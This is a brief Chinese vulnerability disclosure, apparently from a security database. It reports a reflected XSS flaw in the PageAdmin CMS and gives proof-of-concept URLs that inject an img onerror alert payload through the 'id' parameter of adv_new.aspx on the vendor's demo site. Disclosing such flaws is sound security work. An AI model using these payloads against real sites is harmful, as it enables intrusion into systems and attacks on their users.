PageAdmin最新版反射xss

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: http://demo.pageadmin.net/ PageAdmin最新版反射xss ### 详细说明: 构造ID参数,双引号闭合前面。 即可植入html代码。 `http://demo.pageadmin.net/e/aspx/adv_new.aspx?id=1"<img/src=1 onerror=alert(/XSS/)>` http://demo.pageadmin.net/e/aspx/adv_new.aspx?id=1%22%3C/div%3E%3Cimg/src=1%20onerror=alert%28/XSS/%29%3E ### 漏洞证明: [<img src="https://images.seebug.org/upload/201406/28131759360b4498e5a2766d431377f831e2bff7.jpg" alt="TM截图20140628131726.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/28131759360b4498e5a2766d431377f831e2bff7.jpg)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息